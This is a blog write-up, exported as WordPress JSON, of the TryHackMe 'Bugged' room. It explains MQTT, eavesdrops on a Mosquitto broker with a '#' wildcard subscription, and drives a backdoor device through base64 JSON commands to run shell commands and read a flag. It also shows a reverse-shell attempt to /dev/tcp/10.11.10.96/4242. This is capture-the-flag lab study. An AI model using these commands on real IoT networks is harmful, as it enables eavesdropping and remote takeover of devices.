{"id":404,"date":"2023-03-03T21:44:53","date_gmt":"2023-03-03T20:44:53","guid":{"rendered":"https:\/\/babdcatha.net\/?p=404"},"modified":"2023-03-04T14:48:05","modified_gmt":"2023-03-04T13:48:05","slug":"tryhackme-bugged","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/03\/03\/tryhackme-bugged\/","title":{"rendered":"TryHackMe : Bugged"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hey ! A new room was released on TryHackMe.com : <a href=\"https:\/\/tryhackme.com\/room\/bugged\">Bugged<\/a>. The description talks about weird traffic on a network and home appliances. We&#8217;re going to try to complete this room by finding the flag hidden somewhere.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">As usual, we start with an nmap scan searching for open ports and services :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap.png\" alt=\"\" class=\"wp-image-410\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we find a single service running on port 1883 : <a href=\"https:\/\/mosquitto.org\/\">mosquitto<\/a>. This software is an MQTT message broker. The <a href=\"https:\/\/en.wikipedia.org\/wiki\/MQTT\">MQTT Protocol<\/a> is usually used by connected objects that do not often need to send and receive data. In this protocol, there are two different entity types.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Clients : they are the devices on the network which need to communicate between each others. For example, a smart thermometer in a room, or an oven that you can remotely turn on and off. Client do not directly exchange messages between them.<\/li>\n\n\n\n<li>Brokers : they are devices on the network that centralizes these communications. When a device has a message to send, it send it to a broker. The broker then sends it to the required clients.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">To filter messages, they all have a topic. Usually, these topics are strings separated by forward slashes. For example, the garage temperature sensor could send messages with the topic <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">home\/garage\/temperature<\/mark>. When a client wants to receive certain messages, it has to subscribe to topics with the broker. When the broker receives messages with the right topic, it will forward them to all subscribed devices. Here is a drawing explaining that :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"1280\" height=\"720\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/MQTT.svg\" alt=\"\" class=\"wp-image-414\" style=\"border-style:none;border-width:0px;border-radius:35px\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Now that we have a basic understanding of what is happening on the network, we can try to find a way to see what is transiting on this network. To do that, we will use the <a href=\"https:\/\/mosquitto.org\/man\/mosquitto_sub-1.html\">mosquitto_sub<\/a> package, which can be installed using :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">apt install mosquitto mosquitto-clients<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can contact the broker and subscribe to every topic, to see what the clients are sending on the network, <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">-t<\/mark> indicating the topic we want to subscribe to. In this case, we are using the multi-level wildcard to subscribe to everything, so that we can monitor the network traffic.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">mosquitto_sub -h $BROKER_IP -t \"#\" -v<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This is what we get :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"523\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening.png\" alt=\"\" class=\"wp-image-432\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening-768x418.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can see a bunch of IoT devices sending message about their status and measurements, but one of the device looks a bit weird : <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">yR3gPp0r8Y\/AGlaMxmHJe\/qV66JF5qmH\/config<\/mark>, and it seems to send base64 encoded JSON. Let&#8217;s try to decode it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"523\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded.png\" alt=\"\" class=\"wp-image-433\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded-768x418.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Interesting, it looks like this unknown device can be interacted with, and we know to what topic it is subscribed. Let&#8217;s now try to send it a command to see how it responds :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">mosquitto_pub -h $BROKER_IP -t XD2rfR9Bez\/GqMpRSEobh\/TvLQehMg0E\/sub -m '{\"HELP\"}'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And we see a response :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response.png\" alt=\"\" class=\"wp-image-436\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we decode it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded.png\" alt=\"\" class=\"wp-image-437\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hmm, it looks like this device is a backdoor into the network, and we now know what kind of messages it expects. We can now try to play more with it. Using the ID we got from the first message, we can send this command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"cmd\": \"HELP\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, we get a more complete answer :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help.png\" alt=\"\" class=\"wp-image-439\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Which, once decoded, gives us :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"577\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded.png\" alt=\"\" class=\"wp-image-440\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded-300x180.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded-768x462.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">When we run the SYS command, we learn that the system is running a generic 64-bit Linux distribution. We can now run shell commands on the system, if we try to run a simple <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Reverse%20Shell%20Cheatsheet.md#bash-tcp\">bash reverse shell<\/a> :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"cmd\": \"CMD\", \"arg\": \"$REVERSE_SHELL_COMMAND\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This is what we get in return :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\":\"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\",\"response\":\"\/bin\/sh: 1: cannot create \/dev\/tcp\/10.11.10.96\/4242: Directory nonexistent\\n\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It also looks like netcat is not present on the system. Maybe we are trying to go too fast here, if we simply run ls, this is the answer we get :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\":\"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\",\"response\":\"flag.txt\\n\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It was there all along, now, we can cat it and we got our flag !<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur.png\" alt=\"\" class=\"wp-image-444\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We got our flag, and this room is now complete ! I hope you learned a thing or two about MQTT and IoT security, maybe a new idea to create a backdoor if you ever need to. It also personally reminded me that sometimes the simplest things should be tried first. See you next time !<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n<div class=\"wp-block-ub-expand ub-expand\" id=\"ub-expand-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" data-scroll-type=\"false\" data-scroll-amount=\"\" data-scroll-target=\"\">\n<div class=\"ub-expand-portion ub-expand-partial wp-block-ub-expand-portion\" id=\"ub-expand-partial-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" aria-hidden=\"false\">\n\t\t\t\n\t\t\t<a id=\"ub-expand-toggle-partial-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" class=\"ub-expand-toggle-button\" style=\"text-align: left; \" role=\"button\" aria-expanded=\"false\" aria-controls=\"ub-expand-full-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" tabindex=\"0\">\n\t\t\t\tImage credits\n\t\t\t<\/a>\n\t\t<\/div>\n\n<div class=\"ub-expand-portion ub-expand-full ub-hide wp-block-ub-expand-portion\" id=\"ub-expand-full-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" aria-hidden=\"true\">\n\t\t\t\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/server\"><\/a><a href=\"https:\/\/www.flaticon.com\/free-icons\/server\">Server icons created by Freepik &#8211; Flaticon<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/humidity-sensor\"><\/a><a href=\"https:\/\/www.flaticon.com\/free-icons\/humidity-sensor\">Humidity sensor icons created by Maan Icons &#8211; Flaticon<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/temperature\">Temperature icons created by Freepik &#8211; Flaticon<\/a><\/li>\n<\/ul>\n\n\n\t\t\t<a id=\"ub-expand-toggle-full-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" class=\"ub-expand-toggle-button\" style=\"text-align: left; \" role=\"button\" aria-expanded=\"true\" aria-controls=\"ub-expand-full-bc34cbec-0e07-483a-aa1e-79ebf93d623d\" tabindex=\"0\">\n\t\t\t\tshow less\n\t\t\t<\/a>\n\t\t<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Hey ! A new room was released on TryHackMe.com : Bugged. The description talks about weird traffic on a network and home appliances. We&#8217;re going to try to complete this room by finding the flag hidden somewhere. As usual, we start with an nmap scan searching for open ports and services : Here, we find [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[36,37,35,8],"class_list":["post-404","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-iot","tag-mosquitto","tag-mqtt","tag-tryhackme"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":35,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"predecessor-version":[{"id":456,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404\/revisions\/456"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}